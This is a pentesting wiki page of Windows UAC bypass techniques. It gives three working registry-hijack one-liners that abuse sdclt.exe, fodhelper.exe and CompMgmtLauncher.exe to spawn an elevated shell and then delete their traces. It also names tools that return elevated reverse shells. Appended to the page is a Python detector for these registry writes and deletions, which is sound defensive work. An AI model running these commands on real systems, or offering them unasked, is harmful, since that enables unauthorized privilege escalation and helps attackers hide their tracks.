UAC Bypass

From BHaFSec Pentesting Notes Wiki
Revision as of 14:25, 2 October 2017 by Illwill


UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting - x32 x64
TpmInitUACBypass: bypasses User Account Control (UAC) to obtain a high-integrity (or SYSTEM) reverse command shell, a reverse PowerShell session, or a reverse Meterpreter session.
TpmInitUACAnniversaryBypass: same as above, but only works on Windows 10 x64 with the Anniversary Update (version 1607) applied.

UAC bypass for Win10 - control.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

UAC bypass for Win10 - fodhelper.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f

UAC bypass for 7/8/10 - CompMgmtLauncher.exe

reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
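A defender-side check, added here as an example and not part of the wiki page: it scans constructed, Sysmon-style registry events for value writes and key deletions at or below the HKCU keys the three one-liners above plant and then remove. The log line format, its field names and the sample values are assumptions made for this example.

```python
"""Flag registry activity under the HKCU keys hijacked by the one-liners above.
Log format is a constructed, Sysmon-like single line (assumption), not real telemetry."""
import re

# HKCU roots the one-liners write to and delete. In a normal user profile these
# keys do not exist (the real handlers live under HKLM / HKCR), so any value set
# or key delete at or below them deserves an alert. Matching is case-insensitive.
WATCHED_ROOTS = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe": "control.exe / sdclt.exe",
    r"HKCU\Software\Classes\ms-settings": "fodhelper.exe",
    r"HKCU\Software\Classes\mscfile": "CompMgmtLauncher.exe",
}
INTERESTING = {"SetValue": "planted", "DeleteKey": "cleanup"}  # event type -> stage

LINE_RE = re.compile(
    r"^EventType=(?P<type>\w+) Image=(?P<image>\S+) "
    r"TargetObject=(?P<target>.+?) Details=(?P<details>.*)$"
)

def watched_root(target):
    """Return the watched root that `target` is at or below, else None."""
    t = target.replace("HKEY_CURRENT_USER", "HKCU").lower()
    for root in WATCHED_ROOTS:
        r = root.lower()
        if t == r or t.startswith(r + "\\"):
            return root
    return None

def detect(lines):
    """Parse log lines; return one alert dict per plant or cleanup event on a watched key."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["type"] not in INTERESTING:
            continue  # unparsable line or an event type we do not care about
        root = watched_root(m["target"])
        if root is None:
            continue  # write somewhere else in HKCU, e.g. a normal file association
        alerts.append({"stage": INTERESTING[m["type"]], "technique": WATCHED_ROOTS[root],
                       "image": m["image"], "target": m["target"], "details": m["details"]})
    return alerts

# Constructed sample: two plant events, one benign HKCU write, one cleanup delete.
SAMPLE_LOG = r"""
EventType=SetValue Image=C:\Windows\System32\reg.exe TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default) Details=cmd.exe
EventType=SetValue Image=C:\Windows\System32\reg.exe TargetObject=HKCU\Software\Classes\ms-settings\shell\open\command\DelegateExecute Details=(Empty)
EventType=SetValue Image=C:\Windows\explorer.exe TargetObject=HKCU\Software\Classes\.txt\(Default) Details=txtfile
EventType=DeleteKey Image=C:\Windows\System32\reg.exe TargetObject=HKCU\Software\Classes\mscfile Details=
""".strip().splitlines()
```

Running `detect(SAMPLE_LOG)` flags the two plant events and the cleanup delete while ignoring the benign file-association write; the delete is worth keeping because the one-liners remove the key within seconds of use, so the cleanup may be the only trace left on disk.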